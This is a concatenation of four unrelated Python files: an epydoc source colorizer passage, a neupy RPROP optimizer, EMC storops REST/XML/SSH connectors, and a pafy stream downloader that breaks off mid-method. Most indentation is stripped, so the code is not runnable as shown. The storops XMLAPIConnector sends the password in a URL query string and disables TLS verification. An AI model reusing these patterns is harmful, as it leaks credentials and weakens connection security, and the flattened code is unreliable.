#: class or function definition.
self.context = []
#: A list, corresponding one-to-one with L{self.context},
#: indicating the type of each entry. Each element of
#: C{context_types} is one of: C{'func'}, C{'class'}, C{None}.
self.context_types = []
#: A list of indentation strings for each of the current
#: block's indents. I.e., the current total indentation can
#: be found by taking C{''.join(self.indents)}.
self.indents = []
#: The line number of the line we're currently processing.
self.lineno = 0
#: The name of the class or function whose definition started
#: on the previous logical line, or C{None} if the previous
#: logical line was not a class or function definition.
self.def_name = None
#: The type of the class or function whose definition started
#: on the previous logical line, or C{None} if the previous
#: logical line was not a class or function definition.
#: Can be C{'func'}, C{'class'}, C{None}.
self.def_type = None
def find_line_offsets(self):
"""
Construct the L{line_offsets} table from C{self.text}.
"""
# line 0 doesn't exist; line 1 starts at char offset 0.
self.line_offsets = [None, 0]
# Find all newlines in `text`, and add an entry to
# line_offsets for each one.
pos = self.text.find('\n')
while pos != -1:
self.line_offsets.append(pos+1)
pos = self.text.find('\n', pos+1)
# Add a final entry, marking the end of the string.
self.line_offsets.append(len(self.text))
def lineno_to_html(self):
template = '%%%ds' % self.linenum_size
n = template % self.lineno
return '<a name="L%s"></a><tt class="py-lineno">%s</tt>' \
% (self.lineno, n)
def colorize(self):
"""
Return an HTML string that renders the source code for the
module that was specified in the constructor.
"""
# Initialize all our state variables
self.pos = 0
self.cur_line = []
self.context = []
self.context_types = []
self.indents = []
self.lineno = 1
self.def_name = None
self.def_type = None
# Cache, used so we only need to list the target elements once
# for each variable.
self.doclink_targets_cache = {}
# Load the module's text.
self.text = open(self.module_filename).read()
self.text = self.text.expandtabs().rstrip()+'\n'
# Construct the line_offsets table.
self.find_line_offsets()
num_lines = self.text.count('\n')+1
self.linenum_size = len(`num_lines+1`)
# Call the tokenizer, and send tokens to our `tokeneater()`
# method. If anything goes wrong, then fall-back to using
# the input text as-is (with no colorization).
try:
output = StringIO()
self.out = output.write
tokenize.tokenize(StringIO(self.text).readline, self.tokeneater)
html = output.getvalue()
except tokenize.TokenError, ex:
html = self.text
# Check for a unicode encoding declaration.
m = self.UNICODE_CODING_RE.match(self.text)
if m: coding = m.group(1)
else: coding = 'iso-8859-1'
# Decode the html string into unicode, and then encode it back
# into ascii, replacing any non-ascii characters with xml
# character references.
try:
html = html.decode(coding).encode('ascii', 'xmlcharrefreplace')
except LookupError:
coding = 'iso-8859-1'
html = html.decode(coding).encode('ascii', 'xmlcharrefreplace')
# Call expandto.
html += PYSRC_EXPANDTO_JAVASCRIPT
return html
def tokeneater(self, toktype, toktext, (srow,scol), (erow,ecol), line):
"""
A callback function used by C{tokenize.tokenize} to handle
each token in the module. C{tokeneater} collects tokens into
the C{self.cur_line} list until a complete logical line has
been formed; and then calls L{handle_line} to process that line.
"""
# If we encounter any errors, then just give up.
if toktype == token.ERRORTOKEN:
raise tokenize.TokenError, toktype
# Did we skip any whitespace? If so, add a pseudotoken
# for it, with toktype=None. (Note -- this skipped string
# might also contain continuation slashes; but I won't bother
# to colorize them.)
startpos = self.line_offsets[srow] + scol
if startpos > self.pos:
skipped = self.text[self.pos:startpos]
self.cur_line.append( (None, skipped) )
# Update our position.
self.pos = startpos + len(toktext)
# Update our current line.
self.cur_line.append( (toktype, toktext) )
# When we reach the end of a line, process it.
if toktype == token.NEWLINE or toktype == token.ENDMARKER:
self.handle_line(self.cur_line)
self.cur_line = []
_next_uid = 0
# [xx] note -- this works with byte strings, not unicode strings!
# I may change it to use unicode eventually, but when I do it
# needs to be changed all at once.
def handle_line(self, line):
"""
Render a single logical line from the module, and write the
generated HTML to C{self.out}.
@param line: A single logical line, encoded as a list of
C{(toktype,tokttext)} pairs corresponding to the tokens in
the line.
"""
# def_name is the name of the function or class defined by
# this line; or None if no function or class is defined.
def_name = None
# def_type is the type of the function or class defined by
# this line; or None if no function or class is defined.
def_type = None
# does this line start a class/func def?
starting_def_block = False
in_base_list = False
in_param_list = False
in_param_default = 0
at_module_top = (self.lineno == 1)
ended_def_blocks = 0
# The html output.
if self.ADD_LINE_NUMBERS:
s = self.lineno_to_html()
self.lineno += 1
else:
s = ''
s += ' <tt class="py-line">'
# Loop through each token, and colorize it appropriately.
for i, (toktype, toktext) in enumerate(line):
if type(s) is not str:
if type(s) is unicode:
log.error('While colorizing %s -- got unexpected '
'unicode string' % self.module_name)
s = s.encode('ascii', 'xmlcharrefreplace')
else:
raise ValueError('Unexpected value for s -- %s' %
type(s).__name__)
# For each token, determine its css class and whether it
# should link to a url.
css_class = None
url = None
tooltip = None
onclick = uid = targets = None # these 3 are used together.
# Is this token the class name in a class definition? If
# so, then make it a link back into the API docs.
if i>=2 and line[i-2][1] == 'class':
in_base_list = True
css_class = self.CSS_CLASSES['DEFNAME']
def_name = toktext
def_type = 'class'
if 'func' not in self.context_types:
cls_name = self.context_name(def_name)
url = self.name2url(cls_name)
s = self.mark_def(s, cls_name)
starting_def_block = True
# Is this token the function name in a function def? If
# so, then make it a link back into the API docs.
elif i>=2 and line[i-2][1] == 'def':
in_param_list = True
css_class = self.CSS_CLASSES['DEFNAME']
def_name = toktext
def_type = 'func'
if 'func' not in self.context_types:
cls_name = self.context_name()
func_name = self.context_name(def_name)
url = self.name2url(cls_name, def_name)
s = self.mark_def(s, func_name)
starting_def_block = True
# For each indent, update the indents list (which we use
# to keep track of indentation strings) and the context
# list. If this indent is the start of a class or
# function def block, then self.def_name will be its name;
# otherwise, it will be None.
elif toktype == token.INDENT:
self.indents.append(toktext)
self.context.append(self.def_name)
self.context_types.append(self.def_type)
# When we dedent, pop the last elements off the indents
# list and the context list. If the last context element
# is a name, then we're ending a class or function def
# block; so write an end-div tag.
elif toktype == token.DEDENT:
self.indents.pop()
self.context_types.pop()
if self.context.pop():
ended_def_blocks += 1
# If this token contains whitespace, then don't bother to
# give it a css tag.
elif toktype in (None, tokenize.NL, token.NEWLINE,
token.ENDMARKER):
css_class = None
# Check if the token is a keyword.
elif toktype == token.NAME and keyword.iskeyword(toktext):
css_class = self.CSS_CLASSES['KEYWORD']
elif in_base_list and toktype == token.NAME:
css_class = self.CSS_CLASSES['BASECLASS']
elif (in_param_list and toktype == token.NAME and
not in_param_default):
css_class = self.CSS_CLASSES['PARAM']
# Class/function docstring.
elif (self.def_name and line[i-1][0] == token.INDENT and
self.is_docstring(line, i)):
css_class = self.CSS_CLASSES['DOCSTRING']
# Module docstring.
elif at_module_top and self.is_docstring(line, i):
css_class = self.CSS_CLASSES['DOCSTRING']
# check for decorators??
elif (toktype == token.NAME and
((i>0 and line[i-1][1]=='@') or
(i>1 and line[i-1][0]==None and line[i-2][1] == '@'))):
css_class = self.CSS_CLASSES['DECORATOR']
# If it's a name, try to link it.
elif toktype == token.NAME:
css_class = self.CSS_CLASSES['NAME']
# If we have a variable named `toktext` in the current
# context, then link to that. Note that if we're inside
# a function, then that function is our context, not
# the namespace that contains it. [xx] this isn't always
# the right thing to do.
if (self.GUESS_LINK_TARGETS and self.docindex is not None
and self.url_func is not None):
context = [n for n in self.context if n is not None]
container = self.docindex.get_vardoc(
DottedName(self.module_name, *context))
if isinstance(container, NamespaceDoc):
doc = container.variables.get(toktext)
if doc is not None:
url = self.url_func(doc)
tooltip = str(doc.canonical_name)
# Otherwise, check the name_to_docs index to see what
# else this name might refer to.
if (url is None and self.name_to_docs is not None
and self.url_func is not None):
docs = self.name_to_docs.get(toktext)
if docs:
tooltip='\n'.join([str(d.canonical_name)
for d in docs])
if len(docs) == 1 and self.GUESS_LINK_TARGETS:
url = self.url_func(docs[0])
else:
uid, onclick, targets = self.doclink(toktext, docs)
# For all other tokens, look up the CSS class to use
# based on the token's type.
else:
if toktype == token.OP and toktext in self.CSS_CLASSES:
css_class = self.CSS_CLASSES[toktext]
elif token.tok_name[toktype] in self.CSS_CLASSES:
css_class = self.CSS_CLASSES[token.tok_name[toktype]]
else:
css_class = None
# update our status..
if toktext == ':':
in_base_list = False
in_param_list = False
if toktext == '=' and in_param_list:
in_param_default = True
if in_param_default:
if toktext in ('(','[','{'): in_param_default += 1
if toktext in (')',']','}'): in_param_default -= 1
if toktext == ',' and in_param_default == 1:
in_param_default = 0
# Write this token, with appropriate colorization.
if tooltip and self.ADD_TOOLTIPS:
tooltip_html = ' title="%s"' % tooltip
else: tooltip_html = ''
if css_class: css_class_html = ' class="%s"' % css_class
else: css_class_html = ''
if onclick:
if targets: targets_html = ' targets="%s"' % targets
else: targets_html = ''
s += ('<tt id="%s"%s%s><a%s%s href="#" onclick="%s">' %
(uid, css_class_html, targets_html, tooltip_html,
css_class_html, onclick))
elif url:
if isinstance(url, unicode):
url = url.encode('ascii', 'xmlcharrefreplace')
s += ('<a%s%s href="%s">' %
(tooltip_html, css_class_html, url))
elif css_class_html or tooltip_html:
s += '<tt%s%s>' % (tooltip_html, css_class_html)
if i == len(line)-1:
s += ' </tt>' # Closes <tt class="py-line">
s += cgi.escape(toktext)
else:
try:
s += self.add_line_numbers(cgi.escape(toktext), css_class)
except Exception, e:
print (toktext, css_class, toktext.encode('ascii'))
raise
if onclick: s += "</a></tt>"
elif url: s += '</a>'
elif css_class_html or tooltip_html: s += '</tt>'
if self.ADD_DEF_BLOCKS:
for i in range(ended_def_blocks):
self.out(self.END_DEF_BLOCK)
# Strip any empty <tt>s.
s = re.sub(r'<tt class="[\w+]"></tt>', '', s)
# Write the line.
self.out(s)
if def_name and starting_def_block:
self.out('</div>')
# Add div's if we're starting a def block.
if (self.ADD_DEF_BLOCKS and def_name and starting_def_block and
(line[-2][1] == ':')):
indentation = (''.join(self.indents)+' ').replace(' ', '+')
linenum_padding = '+'*self.linenum_size
name=self.context_name(def_name)
self.out(self.START_DEF_BLOCK % (name, linenum_padding,
indentation, name))
self.def_name = def_name
self.def_type = def_type
def context_name(self, extra=None):
pieces = [n for n in self.context if n is not None]
if extra is not None: pieces.append(extra)
return '.'.join(pieces)
def doclink(self, name, docs):
uid = 'link-%s' % self._next_uid
self._next_uid += 1
context = [n for n in self.context if n is not None]
container = DottedName(self.module_name, *context)
#else:
# container = None
targets = ','.join(['%s=%s' % (str(self.doc_descr(d,container)),
str(self.url_func(d)))
for d in docs])
if targets in self.doclink_targets_cache:
onclick = ("return doclink('%s', '%s', '%s');" %
(uid, name, self.doclink_targets_cache[targets]))
return uid, onclick, None
else:
self.doclink_targets_cache[targets] = uid
onclick = ("return doclink('%s', '%s', '%s');" %
(uid, name, uid))
return uid, onclick, targets
def doc_descr(self, doc, context):
name = str(doc.canonical_name)
descr = '%s %s' % (self.doc_kind(doc), name)
if isinstance(doc, RoutineDoc):
descr += '()'
return descr
# [XX] copied straight from html.py; this should be consolidated,
# probably into apidoc.
def doc_kind(self, doc):
if isinstance(doc, ModuleDoc) and doc.is_package == True:
return 'Package'
elif (isinstance(doc, ModuleDoc) and
doc.canonical_name[0].startswith('script')):
return 'Script'
elif isinstance(doc, ModuleDoc):
return 'Module'
elif isinstance(doc, ClassDoc):
return 'Class'
elif isinstance(doc, ClassMethodDoc):
return 'Class Method'
elif isinstance(doc, StaticMethodDoc):
return 'Static Method'
elif isinstance(doc, RoutineDoc):
if (self.docindex is not None and
isinstance(self.docindex.container(doc), ClassDoc)):
return 'Method'
else:
return 'Function'
else:
return 'Variable'
def mark_def(self, s, name):
replacement = ('<a name="%s"></a><div id="%s-def">\\1'
'<a class="py-toggle" href="#" id="%s-toggle" '
'onclick="return toggle(\'%s\');">-</a>\\2' %
(name, name, name, name))
return re.sub('(.*) (<tt class="py-line">.*)\Z', replacement, s)
def is_docstring(self, line, i):
if line[i][0] != token.STRING: return False
for toktype, toktext in line[i:]:
if toktype not in (token.NEWLINE, tokenize.COMMENT,
tokenize.NL, token.STRING, None):
return False
return True
def add_line_numbers(self, s, css_class):
result = ''
start = 0
end = s.find('\n')+1
while end:
result += s[start:end-1]
if css_class: result += '</tt>'
result += ' </tt>' # py-line
result += '\n'
if self.ADD_LINE_NUMBERS:
result += self.lineno_to_html()
result += ' <tt class="py-line">'
if css_class: result += '<tt class="%s">' % css_class
start = end
end = s.find('\n', end)+1
self.lineno += 1
result += s[start:]
return result
def name2url(self, class_name, func_name=None):
if class_name:
class_name = '%s.%s' % (self.module_name, class_name)
if func_name:
return '%s-class.html#%s' % (class_name, func_name)
else:
return '%s-class.html' % class_name
else:
return '%s-module.html#%s' % (self.module_name, func_name)
_HDR = '''\
<?xml version="1.0" encoding="ascii"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>$title$</title>
<link rel="stylesheet" href="epydoc.css" type="text/css" />
<script type="text/javascript" src="epydoc.js"></script>
</head>
<body bgcolor="white" text="black" link="blue" vlink="#204080"
alink="#204080">
'''
_FOOT = '</body></html>'
if __name__=='__main__':
#s = PythonSourceColorizer('../apidoc.py', 'epydoc.apidoc').colorize()
s = PythonSourceColorizer('/tmp/fo.py', 'epydoc.apidoc').colorize()
#print s
import codecs
f = codecs.open('/home/edloper/public_html/color3.html', 'w', 'ascii', 'xmlcharrefreplace')
f.write(_HDR+'<pre id="py-src-top" class="py-src">'+s+'</pre>'+_FOOT)
f.close()
|
|
import tensorflow as tf
import numpy as np
from neupy.utils import tensorflow_session
from neupy.core.properties import BoundedProperty, ProperFractionProperty
from .base import BaseOptimizer
__all__ = ('RPROP', 'IRPROPPlus')
class RPROP(BaseOptimizer):
"""
Resilient backpropagation (RPROP) is an optimization
algorithm for supervised learning.
The RPROP algorithm takes into account only the direction of the gradient
and completely ignores its magnitude. Every weight value has a unique
step size associated with it (by default all of them are equal to ``step``).
The rule is as follows: when the gradient direction (sign) changes we
decrease the step size for that specific weight by multiplying it by
``decrease_factor``, and if the sign stays the same then we increase the
step size for that weight by multiplying it by ``increase_factor``.
The step size is always bounded by ``minstep`` and ``maxstep``.
Notes
-----
The algorithm doesn't work with mini-batches.
Parameters
----------
minstep : float
Minimum possible value for step. Defaults to ``0.001``.
maxstep : float
Maximum possible value for step. Defaults to ``10``.
increase_factor : float
Increase factor for the step when the gradient doesn't change
sign compared to the previous epoch.
decrease_factor : float
Decrease factor for the step when the gradient changes sign
compared to the previous epoch.
{BaseOptimizer.Parameters}
Attributes
----------
{BaseOptimizer.Attributes}
Methods
-------
{BaseOptimizer.Methods}
Examples
--------
>>> import numpy as np
>>> from neupy import algorithms
>>> from neupy.layers import *
>>>
>>> x_train = np.array([[1, 2], [3, 4]])
>>> y_train = np.array([[1], [0]])
>>>
>>> network = Input(2) >> Sigmoid(3) >> Sigmoid(1)
>>> optimizer = algorithms.RPROP(network)
>>> optimizer.train(x_train, y_train)
See Also
--------
:network:`IRPROPPlus` : iRPROP+ algorithm.
:network:`GradientDescent` : GradientDescent algorithm.
"""
# These properties define the upper and lower bounds for the step.
minstep = BoundedProperty(default=0.001, minval=0)
maxstep = BoundedProperty(default=10, minval=0)
# These properties increase/decrease the step by multiplying it
# by some coefficient.
increase_factor = BoundedProperty(minval=1, default=1.2)
decrease_factor = ProperFractionProperty(default=0.5)
def update_prev_delta(self, prev_delta):
return prev_delta
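# Illustrative sketch (comments only) of the per-weight rule implemented in
# init_train_updates below, where ``g`` is the current gradient, ``g_prev``
# the previous one and ``step`` the per-weight step size:
#
#   if sign(g) == sign(g_prev) != 0:  step = min(step * increase_factor, maxstep)
#   if sign(g) == -sign(g_prev) != 0: step = max(step * decrease_factor, minstep)
#   delta = step * sign(g)  # or -prev_delta when the gradient sign flipped
#   parameter = parameter - delta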
def init_train_updates(self):
updates = []
variables = []
for (_, _), variable in self.network.variables.items():
if variable.trainable:
variables.append(variable)
gradients = tf.gradients(self.variables.loss, variables)
for parameter, gradient in zip(variables, gradients):
with tf.variable_scope(parameter.op.name):
steps = tf.Variable(
# Steps will be decreased after the first iteration,
# because all previous gradients are equal to zero.
# In order to make sure that network will use the same
# step per every weight we re-scale step and after the
# first iteration it will be multiplied by
# ``decrease_factor`` and scaled back to the default
# step value.
tf.ones_like(parameter) * self.step,
name="steps",
dtype=tf.float32,
)
prev_delta = tf.Variable(
tf.zeros(parameter.shape),
name="prev-delta",
dtype=tf.float32,
)
# We collect only signs since it ensures numerical stability
# after multiplication when we deal with small numbers.
prev_gradient_sign = tf.Variable(
tf.zeros(parameter.shape),
name="prev-grad-sign",
dtype=tf.float32,
)
updated_prev_delta = self.update_prev_delta(prev_delta)
gradient_sign = tf.sign(gradient)
grad_sign_product = gradient_sign * prev_gradient_sign
gradient_changed_sign = tf.equal(grad_sign_product, -1)
updated_steps = tf.clip_by_value(
tf.where(
tf.equal(grad_sign_product, 1),
steps * self.increase_factor,
tf.where(
gradient_changed_sign,
steps * self.decrease_factor,
steps,
)
),
self.minstep,
self.maxstep,
)
parameter_delta = tf.where(
gradient_changed_sign,
# If we subtract previous negative weight update it means
# that we will revert weight update that has been applied
# in the previous iteration.
-updated_prev_delta,
updated_steps * gradient_sign,
)
# Making sure that during the next iteration sign, after
# we multiplied by the new gradient, won't be negative.
# Otherwise, the same roll back using previous delta
# won't make much sense.
clipped_gradient_sign = tf.where(
gradient_changed_sign,
tf.zeros_like(gradient_sign),
gradient_sign,
)
updates.extend([
(parameter, parameter - parameter_delta),
(steps, updated_steps),
(prev_gradient_sign, clipped_gradient_sign),
(prev_delta, parameter_delta),
])
return updates
class IRPROPPlus(RPROP):
"""
iRPROP+ is an optimization algorithm for supervised learning.
This is a variation of the :network:`RPROP` algorithm.
Parameters
----------
{RPROP.minstep}
{RPROP.maxstep}
{RPROP.increase_factor}
{RPROP.decrease_factor}
{BaseOptimizer.regularizer}
{BaseOptimizer.network}
{BaseOptimizer.loss}
{BaseNetwork.show_epoch}
{BaseNetwork.shuffle_data}
{BaseNetwork.signals}
{Verbose.verbose}
Methods
-------
{BaseSkeleton.predict}
{BaseOptimizer.train}
{BaseSkeleton.fit}
Notes
-----
{RPROP.Notes}
Examples
--------
>>> import numpy as np
>>> from neupy import algorithms
>>> from neupy.layers import *
>>>
>>> x_train = np.array([[1, 2], [3, 4]])
>>> y_train = np.array([[1], [0]])
>>>
>>> network = Input(2) >> Sigmoid(3) >> Sigmoid(1)
>>> optimizer = algorithms.IRPROPPlus(network)
>>> optimizer.train(x_train, y_train)
References
----------
[1] Christian Igel, Michael Huesken (2000)
Improving the Rprop Learning Algorithm
See Also
--------
:network:`RPROP` : RPROP algorithm.
:network:`GradientDescent` : GradientDescent algorithm.
"""
def init_functions(self):
self.variables.update(
last_error=tf.Variable(np.nan, name='irprop-plus/last-error'),
previous_error=tf.Variable(
np.nan, name='irprop-plus/previous-error'),
)
super(IRPROPPlus, self).init_functions()
def one_training_update(self, X_train, y_train):
if len(self.errors.train) >= 2:
previous_error, last_error = self.errors.train[-2:]
session = tensorflow_session()
self.variables.last_error.load(last_error, session)
self.variables.previous_error.load(previous_error, session)
return super(IRPROPPlus, self).one_training_update(X_train, y_train)
def update_prev_delta(self, prev_delta):
last_error = self.variables.last_error
prev_error = self.variables.previous_error
return tf.where(
# We revert weight when gradient changed the sign only in
# cases when error increased. Otherwise we don't apply any
# update for this weight.
last_error > prev_error,
prev_delta,
tf.zeros_like(prev_delta),
)
|
|
# coding=utf-8
# Copyright (c) 2015 EMC Corporation.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from __future__ import unicode_literals
import functools
import logging
import pipes
import six
from retryz import retry
from storops.connection import client
from storops.connection.exceptions import SFtpExecutionError, \
SSHExecutionError, HTTPClientError
from storops.lib import common
paramiko = common.try_import('paramiko')
LOG = logging.getLogger(__name__)
def require_csrf_token(func):
@functools.wraps(func)
def decorator(self, url, **kwargs):
wrapped = retry(on_error=self._http_authentication_error,
on_retry=self._update_csrf_token)(func)
return wrapped(self, url, **kwargs)
return decorator
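# Methods wrapped with ``require_csrf_token`` (POST and DELETE below) are
# retried after a 401 response: ``_update_csrf_token`` fetches a fresh
# ``emc-csrf-token`` header before the original request is replayed.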
class UnityRESTConnector(object):
HEADERS = {
'Accept': 'application/json',
'Content-Type': 'application/json',
'Accept_Language': 'en_US',
'Visibility': 'Engineering',
'X-EMC-REST-CLIENT': 'true',
'User-agent': 'EMC-OpenStack',
}
def __init__(self, host, port=443, user='admin', password='',
verify=False, retries=None, cache_interval=0,
connect_timeout=30, application_type=None):
base_url = 'https://{host}:{port}'.format(host=host, port=port)
insecure = False
ca_cert_path = None
if isinstance(verify, bool):
insecure = not verify
else:
ca_cert_path = verify
if application_type:
self.HEADERS['Application-Type'] = application_type
self.http_client = client.HTTPClient(base_url=base_url,
headers=self.HEADERS,
auth=(user, password),
insecure=insecure,
retries=retries,
ca_cert_path=ca_cert_path,
cache_interval=cache_interval,
timeout=(connect_timeout, None))
def get(self, url, **kwargs):
return self.http_client.get(url, **kwargs)
@staticmethod
def _http_authentication_error(err):
return isinstance(err, HTTPClientError) and err.http_status == 401
@require_csrf_token
def post(self, url, **kwargs):
return self.http_client.post(url, **kwargs)
@require_csrf_token
def delete(self, url, **kwargs):
return self.http_client.delete(url, **kwargs)
def _update_csrf_token(self):
path_user = '/api/types/user/instances'
resp, body = self.get(path_user)
headers = {'emc-csrf-token': resp.headers['emc-csrf-token']}
self.http_client.update_headers(headers)
class XMLAPIConnector(object):
HEADERS = {
'Content-Type': 'application/x-www-form-urlencoded',
}
def __init__(self, host, user='nasadim', password=''):
base_url = 'https://{}'.format(host)
self.http_client = client.HTTPClient(base_url=base_url,
headers=self.HEADERS,
auth=(user, password),
insecure=True)
self.host = host
self.user = user
self.password = password
self._login(host, user, password)
def _login(self, host, user, password):
url = 'https://{}/Login/?user={}&password={}&Login=Login'.format(
host, user, password)
self.http_client.request(url, 'GET')
def post(self, body):
url = '/servlets/CelerraManagementServices'
try:
return self.http_client.post(url, body=body)
except HTTPClientError as ex:
if ex.http_status == 403:
self._login(self.host, self.user, self.password)
self.http_client.post(url, body=body)
else:
raise
class SSHConnector(object):
"""SSH Connection to the specified host."""
def __init__(self, host, username, password, port=22):
self.transport = None
self.init_connection(host, password, port, username)
self.isLive = True
def init_connection(self, host, password, port, username):
self.transport = paramiko.Transport((host, port))
# Currently we only support password authentication for SSH.
if password:
try:
self.transport.connect(username=username, password=password)
except paramiko.ssh_exception.SSHException as ex:
error_msg = ('Failed to setup SSH connection. '
'Reason:%s.' % six.text_type(ex))
LOG.error(error_msg)
raise ex
def execute(self, command, timeout=None, check_exit_code=True):
cmd = ' '.join(pipes.quote(cmd_arg) for cmd_arg in command)
channel = self.transport.open_session()
channel.exec_command(cmd)
channel.settimeout(timeout)
exit_status = channel.recv_exit_status()
stdout = channel.makefile('r').read()
stderr = channel.makefile_stderr('r').read()
channel.makefile('wb').close()
self._ssh_command_log(cmd, stdout, stderr)
# exit_status == -1 if no exit code was returned
if exit_status != -1:
LOG.debug('Result was %s' % exit_status)
if check_exit_code and exit_status != 0:
raise SSHExecutionError(exit_code=exit_status,
stdout=stdout,
stderr=stderr,
cmd=cmd)
return stdout, stderr
def copy_file_to_remote(self, local_path, remote_path):
"""scp the local file to remote folder.
:param local_path: local path
:param remote_path: remote path
"""
sftp_client = self.transport.open_sftp_client()
LOG.debug('Copy the local file to remote. '
'Source=%(src)s. Target=%(target)s.' %
{'src': local_path, 'target': remote_path})
try:
sftp_client.put(local_path, remote_path)
except Exception as ex:
LOG.error('Failed to copy the local file to remote. '
'Reason: %s.' % six.text_type(ex))
raise SFtpExecutionError(err=ex)
def get_remote_file(self, remote_path, local_path):
"""Fetch remote File.
:param remote_path: remote path
:param local_path: local path
"""
sftp_client = self.transport.open_sftp_client()
LOG.debug('Get the remote file. '
'Source=%(src)s. Target=%(target)s.' %
{'src': remote_path, 'target': local_path})
try:
sftp_client.get(remote_path, local_path)
except Exception as ex:
LOG.error('Failed to secure copy. Reason: %s.' %
six.text_type(ex))
raise SFtpExecutionError(err=ex)
def close(self):
"""Closes the ssh connection."""
if 'isLive' in self.__dict__ and self.isLive:
self.transport.close()
self.isLive = False
def __del__(self):
"""Try to close the ssh connection if not explicitly closed."""
self.close()
@staticmethod
def _ssh_command_log(command, stdout, stderr):
LOG.debug('[SSH Command] {}\n'
'[stdout] {}\n'
'[stderr] {}\n'
.format(command, stdout, stderr))
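# --- Illustrative usage sketch (not part of the library) ---------------------
# A minimal example of how the connectors above might be driven; the host
# names, credentials and paths are placeholders, not real endpoints, and the
# function is never called from library code.
def _connector_usage_example():  # pragma: no cover
    rest = UnityRESTConnector('unity.example.com', user='admin',
                              password='secret', verify=False)
    # GET needs no CSRF token; POST/DELETE fetch one on the first 401.
    resp, body = rest.get('/api/types/pool/instances')
    ssh = SSHConnector('vnx.example.com', username='admin', password='secret')
    try:
        stdout, stderr = ssh.execute(['uname', '-a'])
    finally:
        ssh.close()
    return body, stdout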
|
|
import pafy
import datetime
import os
class Stream_Generator():
def __init__(self, url, start_time, end_time, format_type,
chosen_format, top_dir):
self.url = url
self.start_time = start_time
self.end_time = end_time
self.start_time_set = False
self.end_time_set = False
self.title = None
self.duration = None
self.stream = None
self.vid = None
self.chosen_format = chosen_format
self.sub_format = None
self.format_type = format_type
        self.file_path = None  # final path to download the stream to
        self.temp_file_path = None  # temporary file path for conversion/trimming
self.top_dir = top_dir
self.error_messages = None
self.disallowed_characters = ['~', '#', '%', '*', '{', '}', '\\',
':', '<', '>', '?', '/', '+', '|', '"']
def generate(self):
# build stream and set user configuration while handling errors
self.set_url()
if self.get_errors():
return
self.set_time()
if self.get_errors():
return
self.set_media_format()
if self.get_errors():
return
self.set_title()
self.set_file_path()
def set_url(self):
# create a new pafy object from url
try:
#logger.log_debug('Checking if URL exists \'%s\'' % url)
self.vid = pafy.new(self.url)
#logger.log_debug('URL found.')
except (IOError, ValueError): # Catches the exception if the URL wasn't found
self.error_messages = ('URL not found: %s' %self.url)
# handle any unexpected pafy exceptions
except Exception as e:
self.error_messages = ('An unexpected error occurred when searching for '
'URL \'%s\', please try again.' %self.url)
print(e)
#logger.log_debug('URL not found. Exception: %s' % e)
def set_title(self):
        # sanitize the stream title so that it can safely be used as a filename
title = self.stream.title
title = title.replace('"', '\'')
title = title.replace('&', 'and')
for character in self.disallowed_characters:
title = title.replace(character, '')
self.title = title
def set_file_path(self):
# builds a file path for the stream to be downloaded to and builds a temporary
# path if a conversion is required or the stream needs to be trimmed. duplicate
# filenames are checked and handled here.
file_path = os.path.join(self.top_dir, self.title)
        # add ' - Copy' to the filename until it's unique
while os.path.isfile(file_path + "." + self.chosen_format):
file_path += " - Copy"
if self.is_convert_required():
temp_file_path = file_path + '_TEMP'
            # add '_TEMP' to the temporary filename until it's unique
while os.path.isfile(temp_file_path + '.' + self.sub_format):
temp_file_path += '_TEMP'
self.temp_file_path = temp_file_path + '.' + self.sub_format
elif self.is_trimmed():
temp_file_path = file_path + '_TEMP'
            # add '_TEMP' to the temporary filename until it's unique
while os.path.isfile(temp_file_path + '.' + self.chosen_format):
temp_file_path += '_TEMP'
self.temp_file_path = temp_file_path + '.' + self.chosen_format
self.file_path = file_path + '.' + self.chosen_format
def set_time(self):
        # carries out various checks and sets the start and end times
duration = datetime.datetime.strptime('%s' %self.get_duration(), '%H:%M:%S').time()
# check if a start time has been defined
if self.start_time:
self.start_time_set = True
try:
self.start_time = datetime.datetime.strptime('%s' %self.start_time,
'%H:%M:%S').time()
except ValueError:
# catch an exception when the time does not match the pattern 'HH:MM:SS'
self.error_messages = ("The \'start time\' does not match the format \'HH:MM:SS\' for URL: \'%s\'."
%self.url)
return
# check that the start time is less than the duration
if self.start_time > duration:
self.error_messages = ("The start time must be less than the duration for URL: \'%s\'"
%self.url)
else:
self.start_time = datetime.datetime.strptime('00:00:00',
'%H:%M:%S').time()
        # check if an end time has been defined
if self.end_time:
self.end_time_set = True
try:
self.end_time = datetime.datetime.strptime('%s' %self.end_time, '%H:%M:%S').time()
except ValueError:
self.error_messages = ("The \'end time\' does not match the format \'HH:MM:SS\' for URL: \'%s\'."
%self.url)
return
if self.end_time > duration:
self.error_messages = ("The end time must be less than the duration for URL: \'%s\'"
%self.url)
else:
self.end_time = duration
if self.start_time > self.end_time:
self.error_messages = ("The start time must be less than the end time for URL: \'%s\'"
%self.url)
return
self.duration = duration
def set_media_format(self):
        # cycle through all available streams to check whether the
        # user-defined file format is supported
for s in self.get_allstreamlist():
if s.extension == self.chosen_format and s.mediatype == "normal":
self.stream = self.get_bestnormal(self.chosen_format)
return
if s.extension == self.chosen_format and s.mediatype == "audio":
self.stream = self.get_bestaudio(self.chosen_format)
return
# if the chosen file format is not in the stream list, get the best quality stream of
# the same format type as a substitution for now
if self.format_type == 'av':
self.stream = self.get_bestnormal()
elif self.format_type == 'a':
self.stream = self.get_bestaudio()
# get the format of the stream generated
self.sub_format = self.stream.extension
def update_properties(self):
# update stream attributes to account for internal/environment changes
self.set_title()
self.set_file_path()
def is_convert_required(self):
# check if the video needs to be converted to the chosen_format
if self.sub_format:
return True
else:
return False
def is_start_time_set(self):
# check if user has defined the start_time
return self.start_time_set
def is_end_time_set(self):
# check if user has defined the end_time
return self.end_time_set
def is_trimmed(self):
# checks if the user has trimmed the times of the video
if self.start_time_set or self.end_time_set:
return True
else:
return False
def get_errors(self):
return self.error_messages
def get_stream(self):
# return stream object
return self.stream
def get_title(self):
# return video title
return self.title
def get_url(self):
# return youtube URL
return self.url
def get_start_time(self):
# returns user specified start time
return self.start_time
def get_end_time(self):
# returns user specified end time
return self.end_time
def get_chosen_format(self):
